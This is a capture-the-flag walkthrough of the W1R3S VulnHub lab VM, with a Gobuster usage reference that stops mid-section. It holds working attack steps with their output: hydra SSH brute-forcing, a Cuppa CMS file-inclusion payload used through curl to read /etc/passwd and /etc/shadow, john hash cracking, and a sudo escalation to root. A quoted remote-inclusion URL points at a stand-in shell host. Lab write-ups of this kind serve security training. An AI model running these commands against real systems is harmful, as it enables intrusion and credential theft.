# w1r3s
Download: https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

> Starting the target VM

After the download completes, unzip the archive and open it with VMware.

1. In the top-left corner of VMware, click **File** -> **Open**.
2. Select the unzipped VM folder, pick the `.vmx` file and click Open.

## Information gathering

1. Determine which subnet Kali is on.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:f2:f7:23 brd ff:ff:ff:ff:ff:ff
    inet 192.168.186.128/24 brd 192.168.186.255 scope global dynamic noprefixroute eth0
       valid_lft 1122sec preferred_lft 1122sec
    inet6 fe80::20c:29ff:fef2:f723/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
```

2. Scan the subnet Kali is on.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sn 192.168.186.0/24
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:13 EDT
Nmap scan report for 192.168.186.1 (192.168.186.1)
Host is up (0.00070s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.186.2 (192.168.186.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:EC:88:83 (VMware)
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00040s latency).
MAC Address: 00:0C:29:E6:CB:9C (VMware)
Nmap scan report for 192.168.186.254 (192.168.186.254)
Host is up (0.00020s latency).
MAC Address: 00:50:56:EF:45:80 (VMware)
Nmap scan report for 192.168.186.128 (192.168.186.128)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.93 seconds
```

The target's IP address is 192.168.186.131.

3. Scan the target IP for open ports.

> Full TCP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.186.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:16 EDT
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00059s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:E6:CB:9C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 12.40 seconds
```

> UDP scan

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.186.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:16 EDT
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00042s latency).
Not shown: 65534 open|filtered udp ports (no-response)
PORT     STATE  SERVICE
3306/udp closed mysql
MAC Address: 00:0C:29:E6:CB:9C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
```

Open ports: 21, 22, 80 and 3306.

4. Run service/version detection, the default script set and OS detection against the open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80,3306 192.168.186.131
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:22 EDT
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00037s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.186.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:E6:CB:9C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 5.1 - 5.15 (95%), Linux 3.13 - 3.16 (93%), Linux 3.13 - 4.4 (93%), Linux 3.8 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds
```

From this we learn:

- Port 21: FTP, possibly allows anonymous login;
- Port 22: SSH, a brute-force candidate;
- Port 80: the default Apache2 installation page;
- Port 3306: MySQL, possibly reachable without authentication.

5. Run a vulnerability scan against the open ports.

```bash
nmap --script=vuln <target>
```

This runs every NSE script in the "vuln" category and checks automatically for common, well-known vulnerabilities.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p21,22,80,3306 192.168.186.131
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:23 EDT
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00030s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
3306/tcp open  mysql
MAC Address: 00:0C:29:E6:CB:9C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.06 seconds
```

From this we also learn:

- Port 80: there is a WordPress site as well.

## Port 21: anonymous FTP login

1. Connect with FTP. The username is `anonymous`; the password can be empty or anything at all.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 192.168.186.131
Connected to 192.168.186.131.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.186.131:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```

2. If you do not know a command, use `?`.

```bash
ftp> ?
Commands may be abbreviated.  Commands are:

!          case       dir        fget       idle       mdelete    modtime    ntrans     progress   rcvbuf     rmdir      sndbuf     type
$          cd         disconnect form       image      mdir       more       open       prompt     recv       rstatus    status     umask
account    cdup       edit       ftp        lcd        mget       mput       page       proxy      reget      runique    struct     unset
append     chmod      epsv       gate       less       mkdir      mreget     passive    put        remopts    send       sunique    usage
ascii      close      epsv4      get        lpage      mls        msend      pdir       pwd        rename     sendport   system     user
bell       cr         epsv6      glob       lpwd       mlsd       newer      pls        quit       reset      set        tenex      verbose
binary     debug      exit       hash       ls         mlst       nlist      pmlsd      quote      restart    site       throttle   xferbuf
bye        delete     features   help       macdef     mode       nmap       preserve   rate       rhelp      size       trace      ?
```

3. To avoid corrupting files, switch to binary mode with `binary`.

```bash
ftp> binary
200 Switching to Binary mode.
ftp>
```

4. Turn off prompting with `prompt`.

`prompt` is an interactive FTP client command that **toggles interactive prompting**: it controls whether batch transfer commands such as `mget` and `mput` ask for confirmation on every file.

```bash
ftp> prompt
Interactive mode off.
```

5. Download the FTP files locally: `mget` downloads several files at once, `get` downloads a single file.

```bash
ftp> ? get
get             receive file
ftp> ? mget
mget            get multiple files
```

```bash
ftp> ls
229 Entering Extended Passive Mode (|||49991|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||48901|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt
-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt
-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt
226 Directory send OK.
ftp> mget *.txt
local: 01.txt remote: 01.txt
229 Entering Extended Passive Mode (|||49697|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |************************************************************
ftp> cd ..
250 Directory successfully changed.
ftp> cd docs
250 Directory successfully changed.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||43826|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |***********************************************************************
......
```

6. Leave FTP.

```bash
ftp> ? exit
exit            terminate ftp session and exit
ftp> exit
221 Goodbye.
```

7. Open all the downloaded txt files locally.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat *.txt
New FTP Server For W1R3S.inc
# # # # # # # #
01ec2d8fc11c493b25029fb1f47f39ce
# # # # # # # # # # # # #
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
[ASCII-art "The W1R3S" banner; not reproducible from the extracted text]

The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
```

The useful information here is the employee list:

```txt
employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
```

## Port 22: SSH

Normally this gets the lowest priority.

From the employees obtained above, build a username list:

```txt
w1r3s
Hector.A
Gina.L
Albert.O
Joseph.G
Naomi.W
```

rockyou can serve as the password dictionary.

```bash
┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ ls
amass  dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  john.lst  legion  metasploit  nmap.lst  rockyou.txt.gz  sqlmap.txt  wfuzz  wifite.txt

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo gunzip rockyou.txt.gz
[sudo] password for kali:

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ ls
amass  dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  john.lst  legion  metasploit  nmap.lst  rockyou.txt  sqlmap.txt  wfuzz  wifite.txt
```

Brute-force with hydra:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -L users.list -P /usr/share/wordlists/rockyou.txt ssh://192.168.186.131 -t 5
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-01 03:41:26
[DATA] max 5 tasks per 1 server, overall 5 tasks, 86066394 login tries (l:6/p:14344399), ~17213279 tries per task
[DATA] attacking ssh://192.168.186.131:22/
[22][ssh] host: 192.168.186.131   login: w1r3s   password: computer
```

Brute-force succeeded: login: w1r3s, password: computer.

## Port 80

1. Open the target IP address in a browser.

2. Opening /wordpress under the web root redirects immediately, and the redirect target is the domain localhost.

3. Edit the local hosts file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat /etc/hosts
192.168.186.131 localhost
127.0.1.1       kali.localdomain        kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

Trying again still does not work, so WordPress is set aside for now.

4. Directory scan of port 80.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo gobuster dir -u http://192.168.186.131 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.186.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 322] [--> http://192.168.186.131/wordpress/]
/javascript           (Status: 301) [Size: 323] [--> http://192.168.186.131/javascript/]
/administrator        (Status: 301) [Size: 326] [--> http://192.168.186.131/administrator/]
```

Visiting http://192.168.186.131/wordpress/ redirects to localhost.

Visiting http://192.168.186.131/javascript/ returns 403.

Visiting http://192.168.186.131/administrator/ shows a CMS installation page.

This page is most likely built with CuppaCMS.

5. Search the exploit database.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit cuppa cms
--------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                  |  Path
--------------------------------------------------------------------------------------------------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                 | php/webapps/25971.txt
--------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit cuppa
--------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                  |  Path
--------------------------------------------------------------------------------------------------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                 | php/webapps/25971.txt
--------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
```

6. Copy the entry locally and read it.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m 25971
  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
    Codes: OSVDB-94101
 Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /home/kali/Desktop/25971.txt
```

7. According to the advisory, Cuppa CMS has a file inclusion vulnerability that can include both remote and local files. The EXP given is:

```txt
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```

Build the local-file variant:

```txt
http://192.168.186.131/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```

The request succeeds but returns nothing. Could the request method be wrong? The advisory quotes this part of the source:

```txt
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
```

Source download: http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip.

8. Unzip the source and look at the corresponding location.

```php
<div id="content_alert_config" class="content_alert_config">
<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
</div>
```

The parameter is read from a POST request.

9. Build the EXP:

```bash
curl --data-urlencode "urlConfig=../../../../../../../../../etc/passwd" http://192.168.186.131/administrator/alerts/alertConfigField.php
```

The contents of passwd come back:

```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
```

The second field is the password field. An `x` there means the user's password is protected by shadow passwords. The possible values of the second field are:

- `x` = the password is stored in the shadow file
- empty = no password (dangerous!)
- `*` = the account is disabled
- `!` = the password is locked

So, read the shadow file.

```bash
curl --data-urlencode "urlConfig=../../../../../../../../../etc/shadow" http://192.168.186.131/administrator/alerts/alertConfigField.php
```

The file contents:

```bash
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
```

Collect the users that have a password hash:

```bash
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
```

> Structure of the password field

Format: `$id$salt$encrypted`

- `$6` = hash algorithm identifier (sha512crypt, as john reports below)
- `$xe/eyoTx` = the salt
- `$gttdIYrx...` = the password hash

10. Crack the hashes.

Put the users with password hashes into a file, for example shadow.hash.

```bash
┌──(kali㉿kali)-[~/Desktop/bc]
└─$ john shadow.hash
Created directory: /home/kali/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (w1r3s)
Proceeding with incremental:ASCII
2g 0:00:00:54 3/3 0.03703g/s 20903p/s 20932c/s 20932C/s bbalip..bbb189
2g 0:00:15:38 3/3 0.002131g/s 21168p/s 21170c/s 21170C/s mlappo..mlp978
Use the "--show" option to display all of the cracked passwords reliably
```

Username: www-data, password: www-data

Username: w1r3s, password: computer

The www-data account is normally a functional (service) account.

11. Log in over SSH.

Username: w1r3s, password: computer

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh w1r3s@192.168.186.131
The authenticity of host '192.168.186.131 (192.168.186.131)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.186.131' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.186.131's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

639 packages can be updated.
486 updates are security updates.

.....You made it huh?....

Last login: Tue Sep 30 21:41:49 2025 from 192.168.186.128
w1r3s@W1R3S:~$ whoami
w1r3s
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$
```

The key part is:

```bash
groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
```

| GID      | Group      | Permission              | Security significance                        |
| -------- | ---------- | ----------------------- | -------------------------------------------- |
| **1000** | w1r3s      | user's primary group    | basic file permissions                       |
| **4**    | adm        | system monitoring       | can read the system logs under `/var/log`    |
| **24**   | cdrom      | optical drive           | can mount and use CD/DVD drives              |
| **27**   | **sudo**   | **administrative**      | **can run sudo to obtain root**              |
| **30**   | dip        | dial-up networking      | can create PPP/dial-up connections           |
| **46**   | plugdev    | removable devices       | can auto-mount USB devices and the like      |
| **113**  | lpadmin    | printer administration  | can configure and manage printers            |
| **128**  | sambashare | Samba shares            | can access network file shares               |

## Port 3306: MySQL

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ mysql -h 192.168.186.131
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.186.128' is not allowed to connect to this MySQL server
```

Our connection is refused.

## Privilege escalation with sudo

This user is in the sudo group, so check which commands can be run through sudo. `sudo -l` lists the user's sudo privileges.

```bash
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
    (ALL : ALL) ALL
```

Any command may be run through sudo, so:

```bash
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# whoami
root
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~#
```

`sudo /bin/bash` starts a bash shell with administrator privileges (the new bash process inherits root).

```bash
root@W1R3S:~# cd /root/
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
[ASCII-art "CONGRATULATIONS" banner and drawing; not reproducible from the extracted text]
-----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
[ASCII-art "W1R3S" banner].INC
CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
```

## Gobuster

### Overview

> Definition

Gobuster is a **multi-mode dictionary brute-forcing tool**: it sends a large number of constructed requests to the target, combining them with entries from a wordlist (directory names, file names, subdomains, and so on), and uses the responses (status code, length, content) to decide whether the corresponding resource or record exists.

> Features

- **Multiple modes**: directory/file brute-forcing, subdomain brute-forcing, DNS record brute-forcing, VHost (virtual host) brute-forcing and more.
- **High performance**: built on Go's concurrency, it supports high thread counts (10 by default, configurable) and is faster than traditional Python tools such as DirBuster.
- **Flexible filtering**: results can be filtered by status code, response length or regular expression to cut down on noise.
- **Cross-platform**: compiled from Go, it runs on Linux, Windows, macOS and others (preinstalled on Kali).
- **No dependencies**: a single binary with no extra libraries to install.

### Main modes

Run `gobuster -h`:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster -h
NAME:
   gobuster - the tool you love

USAGE:
   gobuster command [command options]

VERSION:
   3.8

AUTHORS:
   Christian Mehlmauer (@firefart)
   OJ Reeves (@TheColonial)

COMMANDS:
   dir      Uses directory/file enumeration mode
   vhost    Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
   dns      Uses DNS subdomain enumeration mode
   fuzz     Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
   tftp     Uses TFTP enumeration mode
   s3       Uses aws bucket enumeration mode
   gcs      Uses gcs bucket enumeration mode
   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --help, -h     show help
   --version, -v  print the version
```

> Directory/file mode (dir)

```bash
# Basic directory scan
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Verbose output
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -v

# Set the thread count
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -t 50
```

```bash
# Full option reference (one option per line, with its meaning)
gobuster dir -u http://target.com             # URL
    -w /usr/share/wordlists/dirb/common.txt  # wordlist
    -t 100                                   # threads
    -o scan_results.txt                      # write results to a file
    -x php,html,txt                          # file extensions to try
    -s 200,204,301,302,307                   # status codes treated as hits
    -b 403,404                               # blacklisted status codes
    -k                                       # skip TLS certificate verification
    -r                                       # follow redirects
    -f                                       # append a slash to directories
    -U admin -P password                     # HTTP basic authentication
```

> DNS subdomain mode (dns)

```bash
# Basic subdomain enumeration
gobuster dns -d target.com -w /usr/share/wordlists/dns/subdomains-top1million-5000.txt

# Use a custom DNS server
